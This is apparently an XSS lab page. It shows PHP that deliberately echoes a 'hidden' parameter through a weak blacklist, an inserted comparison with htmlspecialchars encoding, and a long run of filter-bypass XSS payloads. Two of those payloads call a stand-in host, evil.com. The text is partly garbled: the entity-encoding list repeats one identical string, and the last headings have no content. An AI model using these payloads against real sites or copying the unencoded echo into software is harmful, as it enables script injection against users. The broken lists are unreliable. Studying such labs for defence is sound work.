Test XSS with the most comprehensive bypass prevention ever implemented
This lab demonstrates the most extensive bypass prevention ever implemented. The blacklist now covers multiple string concatenation patterns, HTML entity encoding variations, and Unicode escapes for the "confirm" function, making this the ultimate XSS challenge.
# use the arjun tool to find hidden parameters: id, cat, page, number, page_id, categoryid
Input: <script>confirm(1)</script>
Output: <script>confirm(1)</script>
Input: <script>"c"+"onfirm(1)"</script>
Output: <>""+""</>
Objective: Discover all hidden parameters and find creative ways to bypass the ultimate blacklist filtering to execute XSS payloads.
// Standard secure parameters
if(isset($_GET["fname"]) && isset($_GET["lname"])){
echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Ultimate bypass prevention for hidden parameters
elseif(isset($_GET["id"])){
$arr = array(
// Standard blacklist
'details','alert','confirm','prompt','eval',
'ontoggle','onmousemove','onmouseover','onfocus',
'script','Script','sCript','scRipt','scrIpt','scriPt',
'scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT',
'img','image','svg',
// String concatenation patterns
'"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">',
'"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">',
'"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">',
// HTML entity encoding
"confirm(1)>", "confirm(1)>", "confirm(1)>",
"confirm(1)>", "confirm(1)>", "confirm(1)>",
"confirm(1)>", "confirm(1)>",
// Unicode escapes
"\u0063onfirm(1)>", "c\u006fnfirm(1)>", "co\u006efirm(1)>",
"con\u0066irm(1)>", "conf\u0069rm(1)>", "confi\u0072m(1)>",
"confir\u006d(1)>", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)>"
);
$re = str_replace($arr, '', $_GET['id']);
echo $re;
}
// Same filter applied to: cat, page, number, page_id, categoryid
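An added example (not the lab's own code): the lab's single-pass str_replace blacklist, reduced to a subset of its $arr, placed beside the htmlspecialchars() encoding the lab already applies to fname and lname, both run over the lab's two sample inputs; has_html_active_chars is an assumed helper written for this example.

```php
<?php
// Added example, not the lab's code: the lab's single-pass str_replace
// blacklist (subset of its $arr) next to the htmlspecialchars() call the
// lab already uses for fname/lname, applied to the lab's two sample inputs.

// Lab-style filter: remove listed substrings in one pass, echo the rest.
function blacklist_filter(string $value): string
{
    $arr = [
        'details', 'alert', 'confirm', 'prompt', 'eval',
        'ontoggle', 'onmousemove', 'onmouseover', 'onfocus',
        'script', 'Script', 'sCript', 'scRipt', 'img', 'image', 'svg',
    ];
    return str_replace($arr, '', $value);
}

// Output encoding for an HTML body or quoted-attribute context: every
// structural character is neutralised, whatever the surrounding text is.
// Flags are explicit so the result does not depend on the PHP version's
// defaults for htmlspecialchars().
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Defender's check (assumed helper): do characters that can open a tag,
// close a tag or break out of an attribute survive in the output?
function has_html_active_chars(string $output): bool
{
    return preg_match('/[<>"\']/', $output) === 1;
}

// The two inputs shown on the lab page.
$samples = [
    '<script>confirm(1)</script>',
    '<script>"c"+"onfirm(1)"</script>',
];
foreach ($samples as $input) {
    $filtered = blacklist_filter($input);
    $encoded  = encode_for_html($input);
    printf("input:     %s\n", $input);
    printf("blacklist: %s  [active chars left: %s]\n",
        $filtered, has_html_active_chars($filtered) ? 'yes' : 'no');
    printf("encoded:   %s  [active chars left: %s]\n\n",
        $encoded, has_html_active_chars($encoded) ? 'yes' : 'no');
}
```

Run with php on the command line: the blacklist output still carries tag delimiters while the encoded output carries none, which is the check to apply to any echo of user-controlled input.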
<script>print()</script><script>open()</script><script>console.log(1)</script><script>fetch('http://evil.com')</script><script>XMLHttpRequest()</script><script>location.href='http://evil.com'</script><script>document.write('XSS')</script><script>document.domain</script><script>window['al'+'ert'](1)</script><script>this['al'+'ert'](1)</script><script>self['al'+'ert'](1)</script><script>top['al'+'ert'](1)</script><script>parent['al'+'ert'](1)</script><script>frames['al'+'ert'](1)</script><script>window['al'.concat('ert')](1)</script><script>window[`al${''}ert`](1)</script><script>window['\x61lert'](1)</script><script>window['\141lert'](1)</script><script>window['a'+'l'+'e'+'r'+'t'](1)</script><script>window[String.fromCharCode(97,108,101,114,116)](1)</script><script>window['al'['concat']('ert')](1)</script><script>window['al'+String.fromCharCode(101,114,116)](1)</script><iframe src=javascript:alert(1)><body onload=window['al'+'ert'](1)><marquee onstart=alert(1)></marquee><object data=javascript:alert(1)><embed src=javascript:alert(1)><audio src=x onerror=alert(1)><video src=x onerror=alert(1)><img src=x onerror=alert(1)>
This filter is extremely comprehensive but still has some potential gaps:
Ultimate bypass prevention demonstrates:
For truly secure web applications: